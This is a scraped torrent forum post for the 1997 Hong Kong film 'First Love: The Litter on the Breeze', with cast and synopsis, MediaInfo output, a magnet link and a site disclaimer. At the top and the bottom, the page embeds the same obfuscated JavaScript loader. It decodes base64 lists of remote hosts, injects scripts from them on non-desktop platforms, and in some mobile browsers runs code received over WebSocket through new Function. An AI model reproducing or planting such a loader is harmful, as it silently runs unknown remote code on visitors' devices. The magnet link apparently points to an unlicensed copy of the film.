初缠恋后的2人世界[粤语音轨/繁体字幕].First.Love.The.Litter.on.the.Breeze.1997.BluRay.1080p.DTS-HD.MA5.1.x265.10bit 10.81GB

版主小s 12天前 291

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x48\x6a\x79\x50\x6e\x4a\x66\x6d\x45\x43']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vanNrZGxmamtkLnhpbbnlhbbnNhYXMuY29tLGh0dHBzOi8vbb2pza2RramZrbbGQuaG9uZ3J1aWt0LmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

◎译 名 初缠恋后的2人世界 / 初缠恋后之两人世界 / First Love: The Litter on the Breeze

◎片 名 初纏戀後的2人世界

◎年 代 1997

◎产 地 中国香港

◎类 别 剧情

◎语 言 粤语 / 汉语普通话

◎上映日期 1998-02-21

◎IMDb链接 https://www.imdb.com/title/tt0146745/

◎豆瓣评分 7.8/10 (7473人评价)

◎豆瓣链接 https://movie.douban.com/subject/1308174/

◎片 长 96分钟

◎导 演 葛民辉 Eric Kot (id:1017040)

◎编 剧 叶念琛 Patrick Kong (id:1274344)

陈海琪 Ocean Chan (id:1368717)

◎演 员 葛民辉 Eric Kot (id:1017040)

金城武 Takeshi Kaneshiro (id:1027883)

莫文蔚 Karen Mok (id:1018248)

李维维 Vivi Lee (id:1314319)

蔡一智 Calvin Choi (id:1015990)

谷德昭 Vincent Kok (id:1025526)

兰茜 Lan Sai (id:1315586)

王家卫 Kar Wai Wong (id:1041024)

王双骏 Carl Wong (id:1330724)

何嘉辉 Ka-Hui Ho (id:1439128)

杜可风 Christopher Doyle (id:1045151)

关本良 Pung-Leung Kwan (id:1289161)

陈祺合 Ki-hop Chan (id:1280429)

文念中 Lim Chung Man (id:1275158)

陳秀明 Sau-Ming Chan (id:1403988)

◎标 签 香港 / 金城武 / 葛民輝 / 香港电影 / 王家卫 / 莫文蔚 / 爱情 / 初纏戀后之二人世界

◎简 介

风格别致的伪自传片,由两个故事组成。第一个故事的主角是一个梦游少女(李维维 饰),她每晚梦游都会游走于不同的地方,一天她突发奇想在头上装了一个摄像头,于是她白天的所有事就变成了观看她与神经质男孩(金城武 饰)在夜晚的奇遇,渐渐地他们相爱了,但是各有问题的两个人能不能走在一起呢?第二段故事讲的是李一平(葛民辉 饰)经过了不成功的初恋,对初恋情人赵美娜(莫文蔚 饰)又爱又恨不能忘怀,他带着负罪感躲藏了多年,但是有一天还是被美娜发现了行踪,害怕被暗杀的一平陷入了焦虑。

本片是葛民辉自导自演的处女作,值得一提的是本片的监制是王家卫,摄影是杜可风,编剧是日后转作导演的叶念琛,全片风格深得王家卫真传。

◎获奖情况 (共1项)

第17届香港电影金像奖 (1998)

最佳原创电影音乐(提名)

└──王双骏 (id:1330724)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 122579186418090125727498862950349991237 (0x5C37E47F582F8F7E6D020371CE52ED45)

  4. Complete name : First.Love.The.Litte[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 10.8 GiB

  8. Duration : 1 h 36 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 16.1 Mb/s

  11. Encoded date : UTC 2021-10-13 03:13:23

  12. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  13. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 36 min

  21. Bit rate : 12.0 Mb/s

  22. Width : 1 920 pixels

  23. Height : 1 080 pixels

  24. Display aspect ratio : 16:9

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.241

  31. Stream size : 8.05 GiB (75%)

  32. Title : HEVC, [email protected]@High, 24/1.001 fps @ 11745 kbps

  33. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  34. Encoding settings : cpuid=533541111039 / frame-threads=3 / numa-pools=8 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x1080 / interlace=0 / total-frames=138576 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=19.5 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  35. Language : English

  36. Default : Yes

  37. Forced : No

  38. Color range : Limited

  39. Color primaries : BT.709

  40. Transfer characteristics : BT.709

  41. Matrix coefficients : BT.709


  42. Audio

  43. ID : 2

  44. Format : DTS XLL

  45. Format/Info : Digital Theater Systems

  46. Commercial name : DTS-HD Master Audio

  47. Codec ID : A_DTS

  48. Duration : 1 h 36 min

  49. Bit rate mode : Variable

  50. Bit rate : 4 032 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : C L R Ls Rs LFE

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 93.750 FPS (512 SPF)

  55. Bit depth : 24 bits

  56. Compression mode : Lossless

  57. Stream size : 2.71 GiB (25%)

  58. Title : Cantonese DTS-HD Master Audio 5.1 @ 4032 kbps

  59. Language : Chinese

  60. Default : Yes

  61. Forced : No


  62. Text #1

  63. ID : 3

  64. Format : PGS

  65. Codec ID : S_HDMV/PGS

  66. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  67. Duration : 1 h 32 min

  68. Bit rate : 33.9 kb/s

  69. Count of elements : 1881

  70. Stream size : 22.4 MiB (0%)

  71. Title : Eng/SUP

  72. Language : English

  73. Default : No

  74. Forced : No


  75. Text #2

  76. ID : 4

  77. Format : PGS

  78. Codec ID : S_HDMV/PGS

  79. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  80. Duration : 1 h 32 min

  81. Bit rate : 26.1 kb/s

  82. Count of elements : 1829

  83. Stream size : 17.2 MiB (0%)

  84. Title : Cht/SUP 原盘繁体

  85. Language : Chinese

  86. Default : Yes

  87. Forced : No


  88. Menu

  89. 00:00:00.000 : en:第 01 章

  90. 00:08:05.110 : en:第 02 章

  91. 00:15:14.163 : en:第 03 章

  92. 00:20:41.157 : en:第 04 章

  93. 00:27:54.089 : en:第 05 章

  94. 00:36:07.582 : en:第 06 章

  95. 00:46:45.761 : en:第 07 章

  96. 00:54:56.710 : en:第 08 章

  97. 01:03:33.476 : en:第 09 章

  98. 01:11:25.364 : en:第 10 章

  99. 01:19:10.704 : en:第 11 章

  100. 01:29:11.012 : en:第 12 章




复制代码


TAGS 剧情

磁力链:
  • magnet:?xt=urn:btih:AC68BE93B7238059724A1A0A729B2B7D481C1FCA

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x54\x47\x50\x48\x42\x70\x79\x79\x5a\x53']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vanNrZGxmamtkLnhpbbnlhbbnNhYXMuY29tLGh0dHBzOi8vbb2pza2RramZrbbGQuaG9uZ3J1aWt0LmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};